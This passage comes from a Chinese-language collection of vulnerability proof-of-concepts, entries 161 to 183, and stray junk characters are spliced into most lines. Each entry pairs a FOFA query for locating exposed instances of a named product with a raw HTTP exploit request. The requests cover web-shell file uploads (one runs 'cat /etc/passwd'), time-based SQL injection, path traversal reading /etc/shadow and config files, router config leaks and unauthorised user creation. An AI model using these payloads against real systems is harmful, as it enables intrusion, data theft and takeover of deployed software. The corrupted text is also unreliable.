) q3 Q3 v3 q6 Z5 p, C& i, n1 mAccept-Language: en, i, e/ @. p- W: Y
Accept-Encoding: gzip
- b1 T) F" {: H1 q3 f; }: H+ a7 N$ ?

4 d* B7 f6 r  i- m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 A9 Z. J" A' c+ }' [2 f: ~
FOFA:body="/KT_Css/qd_defaul.css"
- h0 G! I, D. ~; `2 w: k5 M第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
4 Z$ v1 g/ M7 o/ sPOST /Webservice.asmx HTTP/1.1
" p2 q! {- u( {* p6 Q8 w$ _% ZHost: x.x.x.x
; a& ]$ l/ X; K3 W1 G& |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36, d  z  E8 v% K0 t: f
Connection: close
" C( a! {: @' Z- r! DContent-Length: 445- s- \% E8 w. g  M6 x8 H) x4 ]
Content-Type: text/xml- c, Y5 Z$ l) S' q" |+ c0 k
Accept-Encoding: gzip
  ^% u- {) a: P) d
% g' ^2 ~7 w: g* x- r) o<?xml version="1.0" encoding="utf-8"?>, Z& _$ {' F( Z- ~. I5 `( A# M" E
<soap:Envelope xmlns:xsi="3 ?+ v' d2 l$ J% z! r% S0 ^$ d1 S
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ D9 g) y2 X. z" mxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% R/ l" w+ N- x<soap:Body>& ?0 @# u" g, c" w
<UploadResume xmlns="http://tempuri.org/">
3 v: C- H( X8 t- L% j* }5 U<ip>1</ip>
5 H1 {2 j4 q: V+ n<fileName>../../../../dizxdell.aspx</fileName>
7 C  v7 Z4 \# z% L* J/ t/ {4 r: g7 \<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
6 G* H" D  y8 Q9 r! H# ]5 p4 y% g<tag>3</tag>1 `5 P* H, a; C
</UploadResume>
% x4 g* B8 z( p3 G7 Y# U8 H! e1 l# T</soap:Body>
5 B/ N0 @& H6 y( O% m2 z- j) d</soap:Envelope>& M) Y2 r5 }0 R) V1 T0 v1 b
8 m6 }% e) h: w3 Q6 O/ g
  {2 j: z& P5 q% [: A
http://x.x.x.x/dizxdell.aspx
# P, T- e$ G8 U, }  }6 d5 q
- v9 E  S7 [% t" z2 U162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
$ i: R) [2 g7 `FOFA: app="和丰山海-数字标牌"
, q! P* N1 p6 h5 TPOST /QH.aspx HTTP/1.1
5 d) k/ [1 H+ |, p  iHost: x.x.x.x5 J6 y0 t/ b+ @6 S3 q) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' U. x2 }% X! E2 J6 ]Connection: close% w; r/ b6 @0 G$ j
Content-Length: 583
) z2 }5 M. M; w, {/ D8 Z0 NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
7 s' l* H$ F* d0 E- FAccept-Encoding: gzip0 O3 C: Z) G5 d3 c) r
: j6 t' K2 W& S3 L3 }: ^
------WebKitFormBoundaryeegvclmyurlotuey9 E7 b8 ]9 o  L; K
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"7 h, l9 ^1 r( t9 B
Content-Type: application/octet-stream# d  P% F# c! P& q$ c
7 u3 q. ]: _, ~3 E, T  p! X
<% response.write("ujidwqfuuqjalgkvrpqy") %>  `7 m0 O- t/ D6 \
------WebKitFormBoundaryeegvclmyurlotuey/ l: m. {! y( {
Content-Disposition: form-data; name="action". P5 n/ i/ x; ~- D9 v' \8 \7 C* Q

$ C# ~0 Z; ?1 Pupload1 s) G' \9 ~' J! q6 P
------WebKitFormBoundaryeegvclmyurlotuey: d2 I% ?+ `2 j# n' B
Content-Disposition: form-data; name="responderId"# x" s7 Y, B) n1 B
5 d$ U/ Y7 m1 q$ x) e  X) r
ResourceNewResponder# N6 K- p$ D% n/ T5 M% T% u  @: r! ?5 a
------WebKitFormBoundaryeegvclmyurlotuey
- z; b/ |. f& E4 p3 h8 U/ oContent-Disposition: form-data; name="remotePath"( o) G6 r6 `/ }

- @) x2 o+ N" I' G) E# ]/opt/resources
" K1 b0 K! [: g4 S------WebKitFormBoundaryeegvclmyurlotuey--
# A( ^' m1 \8 ]8 |. J& }
, m' e  N* C3 M9 w. S! b/ l# X6 D( F+ ~4 z5 ^  C! }: u  E
http://x.x.x.x/opt/resources/kjuhitjgk.aspx/ |( b# H6 Z7 W/ u- ?' I0 a
% X$ n3 Q1 m! O* _2 L. ?
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
  R9 W! ~  j5 u, {FOFA: icon_hash="-795291075"9 O4 U, p2 }1 P5 S
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.15 l5 Z2 J0 F, T% b% k
Host: x.x.x.x! _! F9 W. j* W* f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ i8 [# T; T: I) @. v+ q8 uConnection: close9 I  _0 z* [) E, U) f$ q0 ~
Content-Length: 293
4 q6 M) \- W2 k! N& |Accept: */*
7 }! ?$ P" Q, x3 e2 e6 gAccept-Encoding: gzip, deflate$ j! c: B' ?2 `2 u& i* C  o
Accept-Language: zh-CN,zh;q=0.9
# Z4 d1 T/ g- W, ^# W. |Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod2 w2 ?! p  X6 f/ D  ]% S% p- q

2 a# ^# X6 ?% C------iiqvnofupvhdyrcoqyuujyetjvqgocod
1 i# {# W) Y8 X. IContent-Disposition: form-data; name="name"
# `: `" P! E, [6 W
( ~5 w! ]! {0 Y7 e8 c1.php! b/ R6 X7 T* a. `. {' G
------iiqvnofupvhdyrcoqyuujyetjvqgocod; c6 }5 v4 l( m, E
Content-Disposition: form-data; name="upfile"; filename="1.php": l% d% R; `+ w
Content-Type: image/jpeg
+ s; P8 `0 s; X6 e. ?/ A# H. c- G: f/ p' j! `5 P7 b) m5 a
rvjhvbhwwuooyiioxega% `; k! F6 s6 C& a" p( y
------iiqvnofupvhdyrcoqyuujyetjvqgocod--' T) ?* I4 Y9 Z/ S$ j$ z

2 `# E8 P$ \( g( X  h# I
+ p' b- [6 N: z8 N  m/ M164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
+ m: k# ~2 s. W4 w/ s, aFOFA: title="智慧综合管理平台登入"
# Z, B. Q4 P/ P9 M! YPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 p: J5 y" c0 }8 M; Z. j
Host: x.x.x.x7 v9 P3 C6 H+ h! @7 W6 y7 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
0 N1 ~9 }0 d6 s$ w* hContent-Length: 288
- A2 d7 l3 w$ f6 x$ @/ T% qAccept: application/json, text/javascript, */*; q=0.01# N# Y4 {1 p1 ^6 ^# O9 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,- s0 V& F; d! w) y
Connection: close4 t* V7 }* s8 M6 m: `, ?4 u
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl% U; q9 K5 _  q; u0 P/ `
X-Requested-With: XMLHttpRequest+ {( w7 Q& J' y( T
Accept-Encoding: gzip
  V- M1 ]' s6 _, q! u$ r
7 O$ ]. _* c' P6 H1 J7 @  @3 ?------dqdaieopnozbkapjacdbdthlvtlyl$ c/ i7 R9 {* w
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
; }- F# z8 q. V) n8 r* E. jContent-Type: image/jpeg. o) V! s- t% p# O
5 S% x6 Q0 ?3 T4 E8 v4 l4 H" K
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>1 Q4 A" \# j1 D/ h
------dqdaieopnozbkapjacdbdthlvtlyl--
  @, D- `; ?1 E
6 A: G7 U9 y0 _
. C' s% P2 Z2 |" |http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx; k* v5 t4 M0 P, ^0 s
, k8 j, |* o  i& F% T: z* }3 L) j3 p
165. OrangeHRM 3.3.3 SQL 注入
6 D5 O( o- F6 Y6 h) GCVE-2024-364282 b  `, W  U& m& `7 ~# v% p; Z% v  O& d
FOFA: app="OrangeHRM-产品"; d# h1 }/ ?8 Q) t, ]6 d+ V. f2 O% M
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
! `9 M0 u$ |$ u2 c' u! w
; Z, N, E& i$ l# H2 H/ a
& p& ^8 k6 S! S2 ]* f$ b166. 中成科信票务管理平台SeatMapHandler SQL注入
6 K4 z9 D9 E" [. |; ~1 ]FOFA:body="技术支持:北京中成科信科技发展有限公司"
3 W1 S# V3 g4 j* g. b1 R6 \POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
! t3 f- m2 q' s" p) A+ c8 n, \# _Host:" \* I3 {& K) d7 o6 j  @. z
Pragma: no-cache# z* j, r7 _3 p9 l2 |4 b, X0 x9 Z: N
Cache-Control: no-cache
$ n0 t+ n2 D. R6 f, WUpgrade-Insecure-Requests: 1
: ~6 x  j* X2 r6 p2 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
/ }' x6 L/ \, R0 m* m: n6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' x1 R& e4 \' z3 l0 h, g
Accept-Encoding: gzip, deflate( t1 x7 e/ [+ M, f4 R. |& U6 U
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  s8 r0 X# k* ^2 h5 q' J( v
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 g* R' W) \7 k# {2 {  f0 r
Connection: close
  R3 j$ C4 u5 n+ e0 r5 p3 nContent-Type: application/x-www-form-urlencoded5 f" }+ }. [# E7 [. _
Content-Length: 895 A2 W" J) w; A! }; p0 }6 ?
3 D& L% l0 i! B/ e! {9 `
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
- C% t- S) `5 r3 g) Y3 z' G- r! e! K+ r; l0 T2 L9 ~5 P
; u2 A3 t2 P7 f- O- a- U. v
167. 精益价值管理系统 DownLoad.aspx任意文件读取' V/ ^3 d3 Z, O8 L$ G
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
! I& z. Q1 `* v+ ^GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1% C0 o4 F: Z: z2 E7 R
Host:
0 ~$ T" p3 j4 k5 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 R+ X1 E' B0 `7 N8 wContent-Type: application/x-www-form-urlencoded& f& h! Z; n, q& H
Accept-Encoding: gzip, deflate
" J, Z9 W% J" t% H5 }1 l& o" [Accept: */*2 u6 R( c9 y0 N9 n1 N4 C; k8 {
Connection: keep-alive- F8 _! p8 V  s- j! f* O1 y. ^

* n6 ]* i( A$ K* ]" w( q
% M: T% z- K# b9 F0 O168. 宏景EHR OutputCode 任意文件读取
1 @  H) b4 L. V. f4 GFOFA:app="HJSOFT-HCM"6 C7 Q8 y1 s! c3 b' Y+ o9 b
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1. K5 `8 S% ~: B) w( ]2 p/ [
Host: your-ip
" M/ V; h: Z. W, J8 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ V% L3 a$ f- M* t5 N' Z  [4 }Content-Type: application/x-www-form-urlencoded
7 k$ H) k2 y4 L- iConnection: close5 P7 s  o" P8 h: y  j* H
! s* ^6 C3 }4 t- o- f3 Z

( g1 g' B$ T5 T  C" N2 e3 V9 |7 v+ c- X# h) n( e
169. 宏景EHR downlawbase SQL注入) I! u7 e6 G) }2 b0 f" J. x. c/ p
FOFA:app="HJSOFT-HCM"
1 y& ^2 F. T2 \+ \0 E, F5 A) _. yGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
8 p, V; d) u3 z5 F  f1 KHost: your-ip5 q0 `7 A; \' k. ~& R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, u2 f! e+ O# a; K  AAccept: */*, t4 g+ R/ y# ]* U' q
Accept-Encoding: gzip, deflate
7 U- P) p, Z5 U+ y. n) b; _Connection: close
7 @0 d- H0 K; r! @( G! e3 h
, i- t$ b' ]  Z: N5 Z8 ]$ G+ o: `! W- z0 v% k4 x8 h* p

5 V, E& f9 _' Z# s170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 _/ R7 o8 ~/ w! ~% cFOFA:body="/general/sys/hjaxmanage.js"+ ?0 p+ |. y( w7 c( B
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1$ L) R. h4 p9 Q6 b9 R: R/ a) `
Host: balalanengliang
0 `- B3 v* X3 B2 oUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* \2 J8 p4 b' `8 Q# W7 G$ G" KContent-Type: application/x-www-form-urlencoded
" d# I6 }. {, P' v# V7 a8 n& `* y
8 O1 U" Q9 q4 y+ g( X1 b; q* ^filename=../webapps/ROOT/WEB-INF/web.xml" c. u  a/ z0 p( S" M
) }7 N! T/ s3 n1 C+ b; l- t+ m; X' ?+ N  S

6 }: p5 z4 c( x; U) Q+ D171. 通天星CMSV6车载定位监控平台 SQL注入+ w( _6 \$ Y/ d- v  S) V# o5 J
FOFA:body="/808gps/"; C' ~0 G' K+ H7 x. G- @' o
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
7 X: e8 s0 `2 Z$ I# z. r- n; hHost: your-ip5 K) e5 B; g% x  W1 w4 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
9 N  y# E/ E$ S9 j6 hAccept: */*# G- r( u) u% F+ \7 P3 q1 [; K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 }$ T5 B8 ?2 \- C- \9 i% v
Accept-Encoding: gzip, deflate, n) N+ A" S3 X; ?) E' |- c
Connection: close
# q: t9 n0 y* x4 s& R* T, C$ _6 d
% |) B( K9 V7 N! z5 ~8 m% w2 I. ?# ]
. s0 C; o% H% _' F8 [' m2 Y: K2 i* M4 S* b- S8 |
172. DT-高清车牌识别摄像机任意文件读取0 s/ Z* _0 v) e
FOFA:app="DT-高清车牌识别摄像机"
- t' c( S9 Q0 g0 Y; w$ z3 SGET /../../../../etc/passwd HTTP/1.1
% s/ M) `5 Y, C4 [, h+ tHost: your-ip# n% J) R" W+ F* E8 y+ D/ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: G* c1 q, M/ |6 @Accept-Encoding: gzip, deflate4 W3 d9 A6 _4 i+ h0 n$ H; W) x  v; ~' E
Accept: */*
! F; p* r6 }0 X0 z  q0 l! ~Connection: keep-alive. j$ U; _! ]+ ~2 j; i

& m1 h7 G$ U$ @7 d0 ^, Z; I3 s% ~6 c9 y
( I& q. X3 J7 D9 W: [& R! Q! g
173. Check Point 安全网关任意文件读取
! r! [8 P" n! F1 A5 d* wCVE-2024-24919
; Q1 J% r4 ?4 N% S9 y  HFOFA:app="Check_Point-SSL-Network-Extender"
; }; [1 O3 k3 z+ u6 ^9 y. {2 z) fPOST /clients/MyCRL HTTP/1.16 x2 w1 D8 l% v2 P
Host: your-ip
8 S4 B, z# o3 JContent-Type: application/x-www-form-urlencoded1 B/ x7 B" z% r; r

4 v1 e4 D4 Y- r( ~0 waCSHELL/../../../../../../../etc/shadow
8 Z# ~% w2 j- n- X' ~$ A
  M6 n  j& ^. g% j0 T
5 w6 J' {' n. V* q% o/ s8 s4 K7 K' L+ g. I( f1 ]- E
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 \& N  @9 R! P. ?7 X( ~! r& a+ bFOFA:app="金和网络-金和OA"* Y" K0 O# ?4 N. K( N3 \3 N
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 h% p8 \: s; p0 ~5 XHost: your-ip
  b% l  ~# F5 m2 H! ~( \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 x& K8 P) t. r; f5 g2 q. aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 d% B$ T# p2 {$ Q" R8 ]/ d# a
Accept-Encoding: gzip, deflate, br
+ {- ~/ `) X% a: OAccept-Language: zh-CN,zh;q=0.9
3 U- Z* [9 a+ a( }Connection: close
' ^0 [+ K4 ^  B* U0 S/ q5 B. s# I( Z; l

& o1 A! h6 k/ q/ a# D: h7 ^- @1 @) }8 C+ C! i* @9 o) a/ Z
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
. p8 V* }; f, F# \FOFA:app="金和网络-金和OA"
& s. C; N; n# gGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.19 b, n. ?1 C; e! i
Host:
9 p  H; E' p6 P7 DUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  C0 a! U6 E: e& P0 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) S4 {3 y# W" W" s# LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ^1 x  i; v# A6 D. Z
Accept-Encoding: gzip, deflate' h( i+ Z: R8 ?/ y6 \) ^$ r
Connection: close
4 z# {  o; y2 IUpgrade-Insecure-Requests: 1
9 K& Z" ?! J6 d- w2 x
" F# Z+ ~6 h) e
1 _( X# m# e( g/ Q) O5 S2 d176. 电信网关配置管理系统 rewrite.php 文件上传; v6 }2 Y. p1 ~. {1 E/ L* ]2 `
FOFA:body="img/login_bg3.png" && body="系统登录"
0 r  M" a( L: ?  ~5 g- qPOST /manager/teletext/material/rewrite.php HTTP/1.1; g6 |) w( p1 k6 ]* I$ }/ g) G# C
Host: your-ip7 M' L$ x/ M& q1 B: J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. d& n% l: Q/ \3 M6 O  MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT6 s8 m7 k/ ?% O- O, i( v8 P
Connection: close
" i5 D" Z* X0 q) U, N, ]& L
, S1 r4 k/ g+ z5 d------WebKitFormBoundaryOKldnDPT/ p) H) @* Z1 ?, m9 a
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
! z3 ?& c, T5 `' RContent-Type: image/png, q6 z9 V5 C* i% e: x! }

: N( n/ k! {: e* ^: A: w<?php system("cat /etc/passwd");unlink(__FILE__);?>  p5 ]5 g( T# b# C
------WebKitFormBoundaryOKldnDPT# N3 h- y1 {& ~. p! Z# \: G* H
Content-Disposition: form-data; name="uploadtime"
2 h2 ]+ L6 Z. P; @0 @1 p0 E
( r7 c) M* D: e& X1 j5 l! [. [ : l% S) ~; v1 R% z( \) K
------WebKitFormBoundaryOKldnDPT--
% ^. k1 N$ V( [) S: [
) w1 p0 R5 u  D2 G$ E5 ]: Q1 Q4 d6 @9 J9 ^# O9 O8 S) }, v

9 V6 F* R" D4 s( p177. H3C路由器敏感信息泄露
4 X. J% Q0 ]0 d. O/ i- L( P& ?/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
4 O$ P! ?0 F7 e1 I/userLogin.asp/../actionpolicy_status/../M60.cfg
) @* ~* i% Y- u/userLogin.asp/../actionpolicy_status/../GR8300.cfg
0 `- M4 v2 z- s) K/userLogin.asp/../actionpolicy_status/../GR5200.cfg
% s& x" s. t$ m% p0 E$ T/ B9 D/userLogin.asp/../actionpolicy_status/../GR3200.cfg
7 r1 t. C8 H5 T% u/userLogin.asp/../actionpolicy_status/../GR2200.cfg
) _: z) J( S- w; q0 y' `/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
: v3 {8 D1 f. [# A9 L/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% F2 U2 R" d: u9 _5 A# r/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
- Z* r! _: Y8 D7 j: ?/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
1 }4 ?# Q; T" @: Y8 Q/userLogin.asp/../actionpolicy_status/../ER5200.cfg7 Q% d* y& I$ g% S1 O& R7 s: l
/userLogin.asp/../actionpolicy_status/../ER5100.cfg( `+ e# X8 @3 V/ `* x
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg  [1 s) n( L. t2 `& h$ I! |' R
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
2 h: B& l4 w: [9 S% Z/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg' ~5 x9 h- ~6 s
/userLogin.asp/../actionpolicy_status/../ER3200.cfg3 b1 B5 L/ N  |2 h: h/ ^% {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg: Q: F. A' B: D, J
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
) s( d$ V9 j5 Z4 R$ Q, Y0 ]/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
" ?0 ]3 D/ W' ~8 f/ I- I/userLogin.asp/../actionpolicy_status/../ER3100.cfg6 A' h" j; [# L1 n1 n% W- |) o) Q
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
, J& T  ?9 G' u3 W6 h" t0 T( y/ N( a8 E. B( @; z

6 F1 H7 A, M: E4 m: b2 G3 N5 f178. H3C校园网自助服务系统-flexfileupload-任意文件上传
0 S& N/ k8 \$ n; `0 o. M$ |FOFA:header="/selfservice"! y: D( q: E% {: }& i
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1% g/ Q2 B/ L& ?% l; f2 B0 b
Host:
3 \, c2 i) K3 e3 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 I: ]$ U# c$ L. ]: t% kContent-Length: 252/ W% }# b5 k3 o% y% I8 }: t0 @
Accept-Encoding: gzip, deflate7 s$ s+ c9 i7 h! c' n
Connection: close$ c; M+ Q1 }4 G3 D8 l- t5 ]; b5 M, }
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l  ]+ r* {5 o: ?; k5 I- j% Z
-----------------aqutkea7vvanpqy3rh2l- H5 N  l7 p( f) {& P3 K1 M
Content-Disposition: form-data; name="12234.txt"; filename="12234"% Q5 ^" M' A+ B
Content-Type: application/octet-stream
8 z6 r6 t% t. fContent-Length: 255/ [: C4 g/ Z- P0 ^" V. ^0 |0 _

: O5 C% p+ m! `) q: t12234% f3 k+ {" _# q: j" ^) X  U
-----------------aqutkea7vvanpqy3rh2l--' u, x" Z7 T: P0 o
+ R3 K- x( @/ Z& ]/ ]: Z

, g. B  k) J, a  C' A/ Q: P$ fGET /imc/primepush/%2e%2e/flex/12234.txt
1 Y" O# Q4 j/ x1 a. `' i( O( {6 l* u( {7 O6 E3 `) B
4 {6 s) h& ]; g
179. 建文工程管理系统存在任意文件读取
- ~& R1 L( [/ M- `POST /Common/DownLoad2.aspx HTTP/1.10 w: V) |) I/ h3 O- ~
Host: {{Hostname}}$ i) r7 G) z3 f4 ~/ x9 ]! x' ]: ~
Content-Type: application/x-www-form-urlencoded
9 [' F* k  T+ v0 P8 zUser-Agent: Mozilla/5.0
3 \' l7 b4 ~& d! _6 i" x1 |  V* |6 a( m9 a1 f) f* p( z' U
path=../log4net.config&Name=9 I" K5 e$ w4 i6 \8 \1 }

% }5 u5 U0 p9 K$ k; Z( v. ?; R$ t1 b
) M1 N! U4 w. D180. 帮管客 CRM jiliyu SQL注入
( {4 @9 J7 j. PFOFA:app="帮管客-CRM"7 ^. a7 z! }3 P$ @; A/ r5 |/ H
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1  d) f/ U, Q% q
Host: your-ip* F* |* g# U; c' S3 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 d  G% p4 r& ^5 T- x0 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 S$ K1 }# D2 s; l) ]4 n. ]  a2 lAccept-Encoding: gzip, deflate
4 B  S! V+ B. z7 t7 ]6 kAccept-Language: zh-CN,zh;q=0.97 s0 m- l( t6 b- k  \
Connection: close5 i8 C7 m( q9 L: l

& `. i0 m2 c% r' {4 l) q! i0 Y! _& v& M% M* _
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
! x0 Z+ o1 v. |- o9 X' [: J# T2 WFOFA:"PDCA/js/_publicCom.js"- |0 [5 q  E4 j
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.15 z4 |0 [9 Z# O& k, C5 S. c
Host: your-ip
7 ~" x  I2 B' Y4 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36% J% M' x! z6 t& y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; z' B* H* t, z( bAccept-Encoding: gzip, deflate, br
  I9 K( {; i  T1 bAccept-Language: zh-CN,zh;q=0.9" s* G, E* R% C5 A5 B
Connection: close
0 d+ t: @- \3 F  Q; wContent-Type: application/x-www-form-urlencoded
; W" L' `9 Y9 |! n3 B$ n# n0 F! H' w5 G2 g! C/ x$ a
; `$ q4 a# o9 ^
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20& r, q+ Z: D% ]' H4 J: p' Q
: R  o* L9 i4 n( k" h, U8 h
) t4 l- P7 p! g0 K. ^; _
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: N8 }' r& S0 a, Q. VFOFA:"PDCA/js/_publicCom.js"
3 `- \- i5 j% _1 fPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
( m! f/ L) H# i& C! IHost: your-ip
. p# e. J+ B$ B) G1 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: V" N" K2 K% R1 g4 J4 r  ~/ [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 t3 ?# L9 B; e0 \0 b, \% u+ HAccept-Encoding: gzip, deflate, br0 G7 f$ m/ C6 J4 c
Accept-Language: zh-CN,zh;q=0.9- r- @4 i9 w4 F
Connection: close
5 M* z- d# r" TContent-Type: application/x-www-form-urlencoded
! m* c) x# b3 p1 `- f, q
* R$ d9 M) z. \' |
; b4 o! ^! g- \* C" j0 D9 L7 X: W( @& yusername=test1234&pwd=test1234&savedays=1
: C7 q5 c$ U" h0 o# d0 W
$ Y+ k2 A5 K) G+ x5 P' |
) C2 `+ h$ l# ]5 e1 R183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) }1 g+ H5 j' ]6 pFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
+ Y+ e. b& R. v2 B& I; R. [- TGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
